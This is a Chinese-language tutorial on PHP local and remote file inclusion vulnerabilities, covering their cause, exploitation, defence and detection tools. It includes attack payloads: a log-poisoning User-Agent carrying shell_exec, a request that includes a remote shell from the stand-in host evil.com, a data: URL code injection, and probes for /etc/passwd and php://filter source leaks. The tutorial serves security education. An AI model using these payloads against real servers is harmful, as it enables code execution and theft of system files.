PHP文件包含漏洞原理分析和利用方法

封面图 • 2025-11-04 • PHP

PHP文件包含漏洞（File Inclusion Vulnerability）是Web开发中一种常见的安全问题，尤其是在使用 `include()`、`require()` 等函数时，如果未对用户输入进行充分验证，攻击者可能通过构造恶意路径来包含远程或本地的恶意代码，从而实现代码执行、信息泄露、权限提升等攻击。

---

## 一、漏洞原理分析

### 1. **基本概念**

在PHP中，`include()` 和 `require()` 函数用于将一个文件的内容插入到当前脚本中。例如：

```php
include('header.php');
```

当用户可以控制 `include()` 中的参数时，就有可能导致漏洞。

### 2. **漏洞类型**

PHP文件包含漏洞分为两种类型：

#### （1）**本地文件包含（Local File Inclusion, LFI）**

攻击者利用系统中存在的文件（如日志文件、配置文件等）进行包含，通常需要满足以下条件：

- 文件路径可控
- 可以访问目标服务器上的文件系统
- 存在可被包含的文件（如 `.php` 文件）

#### （2）**远程文件包含（Remote File Inclusion, RFI）**

攻击者通过包含远程服务器上的恶意脚本（如 `http://evil.com/shell.php`），从而在目标服务器上执行任意代码。

> 注意：RFI 在 PHP 5.2.0 之后默认禁用，但若 `allow_url_include = On`，则仍可能存在风险。

---

## 二、漏洞利用方法

### 1. **本地文件包含（LFI）**

#### （1）**利用日志文件（Log Files）**

很多Web服务器会将访问日志保存在特定路径下（如 `/var/log/apache/access.log`）。如果攻击者可以控制请求中的某些字段（如User-Agent），就可以将恶意PHP代码写入日志文件，然后通过LFI读取并执行。

**示例：**

```php
// 假设攻击者提交如下请求：
GET /index.php?page=../../var/log/apache/access.log

// 在日志中注入PHP代码：
User-Agent: <?php echo shell_exec($_GET['cmd']); ?>
```

然后通过：

```php
include($_GET['page']);
```

即可执行命令。

#### （2）**利用上传文件**

如果存在文件上传功能且上传路径可控，攻击者可以上传一个 `.php` 文件，然后通过LFI包含它。

#### （3）**利用临时文件**

有些PHP应用会生成临时文件，如 `tmp/xxx.txt`，如果这些文件没有正确限制访问权限，也可能被利用。

---

### 2. **远程文件包含（RFI）**

#### （1）**直接包含远程脚本**

假设页面代码为：

```php
include($_GET['page']);
```

攻击者可以构造如下请求：

```
http://example.com/page.php?page=http://evil.com/shell.php
```

如果 `allow_url_include = On`，那么 `shell.php` 的内容会被执行。

#### （2）**利用协议绕过（如 data: 协议）**

攻击者可以通过 `data:` 协议直接嵌入PHP代码：

```
http://example.com/page.php?page=data:text/plain,<?php phpinfo(); ?>
```

这种方式不需要远程服务器，适合在 `allow_url_include = Off` 的情况下利用。

---

## 三、防御方法

### 1. **避免用户输入直接用于文件包含**

不要让用户输入直接作为文件名传入 `include()` 或 `require()`。

### 2. **使用白名单机制**

只允许包含预定义的合法文件，如：

```php
$allowed_pages = ['home', 'about', 'contact'];
$page = $_GET['page'];

if (in_array($page, $allowed_pages)) {
    include("pages/{$page}.php");
} else {
    die("Invalid page.");
}
```

### 3. **过滤特殊字符**

对用户输入进行严格过滤，防止路径遍历（如 `../`、`./`）和特殊字符。

```php
$page = basename($_GET['page']);
include("pages/{$page}.php");
```

### 4. **关闭远程文件包含（RFI）**

在 `php.ini` 中设置：

```ini
allow_url_include = Off
```

### 5. **使用安全编码规范**

- 避免动态拼接文件路径
- 使用绝对路径
- 不信任任何用户输入

---

## 四、常见工具与检测方式

### 1. **漏洞扫描工具**

- **Netsparker**
- **Acunetix**
- **Burp Suite**
- **OWASP ZAP**

### 2. **手动测试方法**

- 尝试 `?page=../../etc/passwd`
- 尝试 `?page=php://filter/convert.base64-encode/resource=index.php`
- 尝试 `?page=data:text/plain,<?php phpinfo();?>`

---

## 五、总结

| 漏洞类型 | 描述 | 风险等级 | 防御建议 |
|----------|------|-----------|-----------|
| LFI | 包含本地文件 | 高 | 白名单、过滤、路径限制 |
| RFI | 包含远程文件 | 极高 | 关闭 allow_url_include |

---

如果你是开发者，请务必遵循“最小权限原则”，不信任任何用户输入，并对所有外部数据进行严格的过滤和校验。

如果你是渗透测试人员，请在授权范围内进行测试，遵守法律法规。